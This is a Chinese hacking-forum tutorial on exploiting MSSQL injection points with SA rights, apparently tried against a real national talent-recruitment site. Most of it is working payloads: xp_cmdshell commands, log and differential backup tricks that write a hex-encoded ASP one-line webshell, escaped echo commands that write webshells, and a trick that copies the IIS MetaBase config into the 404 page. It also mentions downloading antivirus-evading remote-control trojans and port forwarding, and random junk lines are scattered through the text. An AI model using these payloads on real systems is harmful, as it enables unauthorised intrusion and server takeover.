中国网络渗透测试联盟
标题:
sa权限的教程.
[打印本页]
作者:
admin
时间:
2012-9-15 14:30
标题:
sa权限的教程.
————————————————————————九零后安全技术小组 | 90 Security Team -- 打造90后网安精英团队 ———————————————————————————————
: Z: \" l7 J( c; I$ o) x
; N- B* c. s2 L
% o4 k0 Y* `! [) ]% J/ l( |! b
欢迎高手访问指导,欢迎新手朋友交流学习。
6 c! ~9 w9 z/ Q9 L( T* L* p
- X( J0 s/ W8 X2 C" _ I3 C
2 z$ |2 {& D, q
* G4 ?" g) Q; \ l% S/ F9 U
论坛:
http://www.90team.net/
7 o; ]* e& M7 ~, \
9 S" D- g# L! z- f3 m4 ~% }) M1 j0 w
" w% V7 N. ]; h3 h/ X* z
( z; ~6 L) \4 W9 |$ M) o( ?
友情检测国家人才网
1 S8 j" n3 X4 T) ^
1 J3 D9 i) B* z
7 ? J4 P' Y( _1 {- c- q! ^9 ]
内容:MSSQL注入SA权限不显错模式下的入侵
f# A6 \" q1 F) ?1 M8 f" m1 D
1 I" u. y, J0 {3 I# X; E P
# f2 ~( D5 o1 G8 U$ G
一般新手扫到不显错的SA(systemadmin)的注入点时,虽然工具能猜表列目录但还是很麻烦有的人就直接放弃了,今天我给大家演示下如何利用。方法很简单大家看操作。
' @2 i9 o% U0 S) A% R" x* R
" m6 J8 t% _' }% g
我这里使用的是 火狐的插件提交参数。跟在浏览器里直接提交一样。
0 C. Y& Y( Q% w$ ?" k4 w H8 H$ s
: u8 p, t* S! p( }/ ]( U& _
$ q8 j# S- J6 O( G
这里的主机环境:MSSQL+JSP 权限为不显错的SA,支持多行执行 xp_cmdshell存活 服务器处于内网,WEB和数据库在同一台服务器上。注意这里服务器操作系统是windows2003,IIS,404页面的默认路径是 C:\Windows\Help\iisHelp\common\404b.htm。
8 p8 Z; M, G8 t" d7 G9 S
3 c5 X: E8 U2 C
思路:
2 L9 }$ |% ]( J9 o- E- p
/ c# `( E9 F* w4 z9 M
首先:
+ j1 K. C2 U+ Z- n: R& o
2 l, K; M# B. e) X6 D: D& K
通过XP_CMDSHELL 执行命令再将执行结果指向IIS的404页面,然后访问WEB站点的一个不存在的目录得到命令执行结果,刺探服务器信息。
0 X5 g" c. |, p0 r
; p% K& N: L8 J
1.日志备份获得Webshell
7 [- U0 C$ c, \( l; [% E0 A
2 v' h2 r8 e: m
2.数据库差异备份获得Webshell
+ j' z3 o" U0 X$ Z# r9 |+ P* w
- W' m' j( g! b& U3 ^5 U
4.直接下载免杀远控木马。
( E" r# r$ i. ^; _
5 f) t( V, n" q0 _+ ^4 j" i4 p
5.直接下载LCX将服务器端口转发出来
* `- c# I& Z! d# `8 k% b1 ^
- ]& w- R4 K; w: p) u
6.通过XP_CMDSHELL 执行命令读取iis配置文件(C:\Windows\system32\inetsrv\MetaBase.xml )分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL上传LCX将服务器转发出来。
7 m/ `' H( ^9 U- v. X
, l% h7 i: d% c+ i0 C
4 ] N8 R+ W9 K2 [7 e- K
4 n- G' o; J6 s9 I& z, V
在这里我就不浪费大家时间了,我已经测试过 日志备份和 数据库差异备份 都没有成功 我就不演示了。 直接下载免杀木马。。这个也不用演示了。 直接在注入点后写入一个 DOWN 的VBS脚本下载就行了,
; q" C R2 }& w0 i% c1 ^7 P5 n
7 P9 g" C9 p1 S
我直接演示后面一个方法
1 B( }: b3 q' C/ k
5 w) E& g: a/ j- [4 K
5 f7 m6 H! r, j# ]
分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL
+ P. X0 P7 Y; m6 u; e4 l. }9 z: E8 Y
- a( q# R; S* r" r: E
+ n% Y* @, j6 W$ Q/ Z
* _* J! }2 k& M5 F
3 t- k0 r# Y! x0 w8 Z
◆日志备份:
4 S! Y4 F) h% u- W' w" x o5 `" e
1 _8 g3 n; W' N, n
! t# z) U J6 O6 ~
1. 进行初始备份
+ s9 Q- z. T6 f5 F- {1 B
; Alter Database TestDB Set Recovery Full Drop Table ttt Create Table ttt (a image) Backup Log TestDB to disk = '<e:\wwwroot\m.asp>' With Init--
6 [9 I$ k9 v% u; l# y" h
6 y7 @4 v9 @7 Q
2. 插入数据
4 h5 r y# O! h
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
' ~7 V* c. q) ~4 z5 A5 k) _
" L$ S( P+ x Y
0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E 为 一句话木马 %><%eval(request(chr(97))):response.end%>
2 B# X, f6 m# x x
' s* Y W7 O0 s' s9 L, [( X- e# R
3. 备份并获得文件,删除临时表
- j$ N5 T. f* c3 R
;Backup Log <数据库名> To Disk = '<e:\wwwroot\m.asp>';Drop Table ttt Alter Database TestDB Set Recovery SIMPLE--
) | J7 f& @# q a
/ J" S" e1 q% I1 N8 I
3 e( V7 j, m/ o& T) K( A
5 J5 x7 d5 G% O% h/ { X) h- V
◆数据库差异备份
) w$ j T' T9 \1 V% K
3 q# {8 e5 s1 m3 R' S# W% ~
(1. 进行差异备份准备工作
0 u0 u3 \3 C ~9 i3 k# R
, b# r: F; k3 p! i0 k1 Y; ~
;Declare @a Sysname;Set @a=db_name();Declare @file VarChar(400);Set @file=<0x633A5C746573742E617370>;Drop Table ttt Create Table ttt(c Image) Backup Database @a To Disk=@file--
2 k& \& q( Z% l
+ K7 ^! M! N3 [2 |/ N' r* s
上面的 0x633A5C746573742E617370 是 c:\test.asp 路径转换后的16进制编码
, Q, @& N% A5 p+ c; E/ x
8 n; r( X, U, y) ?: x- M. {
- I2 f/ x# o/ U5 z
(2. 将数据写入到数据库
9 X5 p# S* p+ z9 E8 Z
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
, E9 g& ]# [3 \; J& v
- u! ^4 z$ s$ J- h
0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E 为 一句话木马 %><%eval(request(chr(97))):response.end%>
" |7 ~' `3 E$ a( V
: K$ A8 M4 X% T8 [* s' [
3. 备份数据库并清理临时文件
0 o. }) E/ ~1 v t( {# { k! i
2 a! f" f+ A' K9 t+ g) p" b
;Declare @b SysName;Set @b=db_name();Declare @file1 VarChar(400);Set @file1=<0x633A5C746573742E617370>;Backup Database @b To Disk=@file1 With Differential,Format;Drop Table ttt;--
( _' ~7 q- W. W
( c* v7 S M$ ] B
0x633A5C746573742E617370 为 c:\test.asp 删除临时文件
, m, o" i6 h6 V) ^% T2 G
% h8 H# F: U8 A# E% ^
2 V0 v' h4 e% x( h; R. B c
, k& n) o! \6 [! }7 c
用^转义字符来写ASP(一句话木马)文件的方法:
4 ]9 p) n/ f2 ~) l5 l( I
2 J* O. O3 U" Y8 Q7 w6 U
1.注入点后执行;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("90"^)^</script^> >c:\mu.asp';--
6 B0 `5 ?2 t+ y: s
% Q/ e7 X) I$ D B. y
2.CMD下执行 echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp
, r* O9 ^ ?. i" n/ Z3 W w
/ \) l @" V0 l: r/ G/ n
读取IIS配置信息获取web路径
. D, C6 A: E! t
6 q( Q+ |+ V. j, ~* T( g2 s
' k: {7 X! l) y3 Q7 s# Z% L: `: h
注入点后面执行 ;exec master..xp_cmdshell 'copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm'--
2 H( H0 u+ u/ C5 G, k, ]. z* u" ]
+ r! Y) C( F: M3 o% e
执行命令
! U7 E6 X; W6 o' s+ h% G7 e- h
/ `. G' ]. m- j: ~! \
注入点后面执行 ;exec master..xp_cmdshell 'ver >C:\Windows\Help\iisHelp\common\404b.htm'--
" h8 W1 V9 a5 N" ], C
8 z( E" w' R0 Y0 w+ V6 e
0 D% M6 u3 C, h4 s. h
7 H$ I2 `. G5 X. v2 r5 @0 \) W2 U
/ g6 y: r+ Z5 e% H. B T- m+ S& X
+ n+ f4 V: I. R2 j/ s I. C& m+ d
1 D+ f8 _3 h9 j. Y, w
$ h3 J. b0 L/ ~% Y6 q7 a7 A( X J
' J" V7 I5 ?% Y5 N0 N
9 G3 z0 A0 o' q e$ ^; _9 V
9 Y! l4 h% C' p, u) p" S+ W
x' {2 m* U1 G2 K: n
+ V8 H! C+ s* I) X
6 N: r% g3 R% O$ D6 D
9 n7 `6 D3 D$ q* f' k6 V, M
3 |" n) C) Z4 `6 W) l
7 _' N* [+ C2 u- D1 ]
& G0 N1 q5 f m5 T
4 o1 c- u( A, ~3 H8 J6 {
2 F1 l9 m: }- ~
) j! T. y7 c ?7 Z
& Y4 [/ t8 P' I
. P, R$ [. B" P) `8 I
- _6 T2 W: E2 F% Z! ]
, A# F0 g! @$ A) l6 R! [: Y
4 Z1 } ?$ O# _
4 V" ?4 A! J/ a. b6 _! M, ~; @* k p
4 d+ a7 t+ A: {. u; j3 a. b
) x8 _ l# n' t
# r2 h# U; v8 l- H+ ?0 I
/ Z# B5 A0 O5 K% b
$ }* i. a4 E0 l; I9 ]7 G, R, M# y
" Q4 w0 `; ^: i1 U3 [2 ?8 {! K
! u) q. t9 X* J9 n5 g
1 l9 e2 k7 o9 I9 l
/ S, L/ v# W8 [/ c3 q. A4 t
$ F2 K; _9 `: |0 V5 n/ j3 W3 ~. p7 V
3 ]: {0 r/ u4 A
9 \' A9 w5 M6 E8 X% z
. ], M* x% b7 D1 S+ E* Y% d
3 p$ |8 W: `2 [1 B4 J/ f2 |
4 R* U( ?' w# ~& h- |; ?
& v) z$ x- a/ X2 c& Y' o/ _) n
# t8 }4 ?( S- e) }3 D
2 d# h* N! b2 ?& q
6 K' t9 l* e% H* p
4 m$ M6 b" D" Z9 @$ \- w
5 [+ e, Z% V8 l! h
% ?% x& F+ e3 h* i5 a3 g
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2